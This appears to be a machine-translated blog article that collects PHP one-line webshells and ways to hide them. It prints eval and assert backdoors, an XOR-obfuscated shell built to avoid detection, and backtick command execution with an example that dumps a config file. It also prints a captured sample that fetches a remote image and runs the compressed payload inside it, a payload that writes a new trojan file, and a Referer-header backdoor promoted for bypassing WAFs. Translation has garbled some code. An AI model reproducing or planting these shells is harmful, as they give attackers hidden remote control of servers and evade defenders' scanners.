This kind of backdoor is a headache for website and server administrators.Always change methods to perform various tests,And many emerging writing techniques,It is impossible to find and deal with ordinary detection methods.Today we are going to count some interesting PHP sentence trojans.

A most common one-sentence backdoor might be written like this

<?php @eval ($_ post ["cmd"]);?>

Or like this

<?php @assert ($_ post ["cmd"]);?>

Tudouya classmates give a [structuring technique] use on freebuf

?[email protected]$_ ++;//$_=1 $__=("#" ^ "|");//$__=_ $__.=("." ^ "~" );//_p $__.=("/" ^ "` ");//_po $__.=(" | "^"/");//_pos $__.=(" {"^"/");//_post ${$__} [! $_] (${$__} [$_]);//$_post [0] ($_ post [1]);?>

Construction generation,Of course, it is too intuitive to write this

<?[email protected]$_ ++;$__=("#" ^ "|"). ("." ^ "~"). ("/" ^ "` "). (" | " ^ "/"). ("{" ^ "/");@ ${$__} [! $_] (${$__} [$_]);?>

Then fill in some ordinary code to disguise,A simple "kill-free" shell sample appears

Let's take a look at the easiest hack-free backdoor in history

Directly on the code:

$c=urldecode ($_ get ["c"]);if ($c) {`$c`;} //Complete
! $_ get ["c"] || `{$_ get [" c "]}`;//Simplify
/************************************************* ******
 * Principle:In PHP, `` symbol inclusion will be executed as a system command
 * Example:http://host /?c=type%20config.php>config.txt
 * Then you can download config.txt to view the content!
 * Try more perverted commands,Don't do bad things!
 ************************************************** ***** /

The implementation principle is that php will directly parse the contents of the `symbol (note:not single quotes) into system commands for execution! Then you can expand freely and abnormally!

Let's look at an equally simple piece of code.

preg_replace ("/[errorpage]/e",@str_rot13 ("@ nffreg ($_ cbfg [cntr]);"), "saft");

Password page

Recently captured a webshell sample based on PHP implementation, its clever code generation method,Insignificant page disguise,Let us feel a lot of fun in the analysis of this sample.Let's enjoy this wonderful webshell together.

The webshell code is as follows:

error_reporting (0);
session_start ();
header ("content-type:text/html;charset=utf-8");if (empty ($_ session ["api"]))
$_session ["api"]=substr (file_get_contents (
sprintf ("%s?%s", pack ("h *",""
@preg_replace ("~ (. *) ~ ies", gzuncompress ($_ session ["api"]), null);

The key is to look at the following code,

sprintf ("%s?%s", pack ("h *", "687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067 ′), uniqid ())

This is actually an image after execution.The decrypted picture address is as follows:

Then call the file_get_contents function to read the picture as a string,Then substr takes the content after 3649 bytes,Then call gzuncompress to decompress and get the real code.Finally, the modifier e of preg_replace is called to execute the malicious code.The following statement is executed here to restore the malicious sample code.

echo gzuncompress (substr (file_get_contents (sprintf ("%s?%s", pack ("h *","687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067 ′), uniqid ())), 3649));

No feature to hide PHP in one sentence:

session_start ();
$_post ["code"]&&$_session ["thecode"]=trim ($_post ["code"]);
$_session ["thecode"]&&preg_replace ("\" a \ "eis", "e". "v". "a". "l". "(base64_decode ($_ session [\" thecode \ "]))" , "a");

Assign the contents of $_post ["code"] to $_session ["thecode"], and then execute $_session ["thecode"]. The highlight is that there is no signature code.If you use a scanning tool to check the code,Will not call the police,Achieved the goal.

Super covert php backdoor:

<?php $_get [a] ($_get [b]);?>

Using only the get function constitutes a Trojan;


?a=assert&b=${fputs%28fopen%28base64_decode%28yy5waha%29, w%29, base64_decode%28pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x%29%29};

After execution, the current directory generates a c.php trojan horse,When pass parameter a is eval, it will report a Trojan generation failure.The same error is reported for assert,But it will generate a Trojan,Really can't be ignored.A simple sentence,Was extended to such applications.

Hierarchy request,Coding the php backdoor:

This method is implemented with two files,File 1

header ("content-type:text/html;charset=utf-8");
parse_str ($_server ["http_referer"], $a);
if (reset ($a) == "10"&&count ($a) == 9) {
eval (base64_decode (str_replace ("", "+", implode (array_slice ($a, 6)))));

File 2

header ("content-type:text/html;charset=utf-8");
//Code to be executed
$code =<<code
phpinfo ();
//Base64 encoding
$code=base64_encode ($code);
//Construct the referer string
$referer="a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h =&i =";
//backdoor URL
$ch=curl_init ();
$options=array (
curlopt_url =>$url,curlopt_header =>false,curlopt_returntransfer =>true,curlopt_referer =>$referer
curl_setopt_array ($ch, $options);
echocurl_exec ($ch);

Run the base64 encoded code through the http_referer in the http request,To achieve the effect of a backdoor,Generally waf is a bit looser for these referer detections.Or no detection.Using this idea to bypass waf is good.

We treat these PHP backdoors with a learning mentality,A lot of PHP backdoor code shows us how hard the programmers are.

  • Previous JS dynamically generates Html elements to implement Post operation (createElement)
  • Next IE9 + has no backwards compatible solution for documentcreateElement